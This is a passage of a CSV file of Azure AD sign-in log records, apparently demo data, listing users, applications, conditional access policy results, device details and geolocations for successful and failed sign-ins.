+166,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:38.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:27,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'isCompliant': True, 'trustType': 'Azure AD joined', 'isManaged': True}",738fc06f-0aae-42ae-87fe-a657ec496a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,738fc06f-0aae-42ae-87fe-a657ec496a00,SigninLogs,Sucess,40.75891113,-73.97901917
+167,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:33.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f7ba3cc7-11fe-4554-9ac4-efce7ddc1300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f7ba3cc7-11fe-4554-9ac4-efce7ddc1300,SigninLogs,Sucess,50.6406517,5.572050095
+168,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,21b74ec9-9475-45e3-963b-6d387039b5ea,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",459ca702-517f-41c3-88f0-2f42b1e41300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,459ca702-517f-41c3-88f0-2f42b1e41300,SigninLogs,Sucess,33.7984581,-84.38828278
+169,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:06.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d9e52723-6216-4023-a006-31565b7b7d3c,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",8a945db4-b61d-4e46-b881-75d8d71b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8a945db4-b61d-4e46-b881-75d8d71b1300,SigninLogs,Sucess,38.73078156,-78.17196655
+170,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:19.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50126,None,Invalid username or password or Invalid on-premise username or password.,0,dfe2b6e7-f85a-424d-b915-0eb870e66d9e,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft Azure,0c1307d4-29d6-4389-a11c-5cbe7f65d7fa,Mobile Apps and Desktop clients,[],notApplied,08/04/2020 10:24,"{'operatingSystem': 'iOS 13', 'deviceId': '', 'browser': 'Mobile Safari 13.4'}",d3a3c86e-d6a1-4323-9bc0-1a26abe30800,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50126, 'failureReason': 'Invalid username or password or Invalid on-premise username or password.'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d3a3c86e-d6a1-4323-9bc0-1a26abe30800,SigninLogs,Failed,50.6406517,5.572050095
+171,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:29.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d4df14-2ec3-46f2-a774-ff58d6b41600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,93d4df14-2ec3-46f2-a774-ff58d6b41600,SigninLogs,Sucess,50.6406517,5.572050095
+172,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:03.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5ba30877-fe5d-4dc4-8c19-e13fae641600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5ba30877-fe5d-4dc4-8c19-e13fae641600,SigninLogs,Sucess,33.0175209,35.44601059
+173,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:58.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c811973-7dd8-458d-8675-48f4aaddbe23,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5f11d930-41ca-43a7-b362-f3ce03341400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,5f11d930-41ca-43a7-b362-f3ce03341400,SigninLogs,Sucess,33.7984581,-84.38828278
+174,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:58.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,046b745e-238b-40a1-9d77-9f39e688e946,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 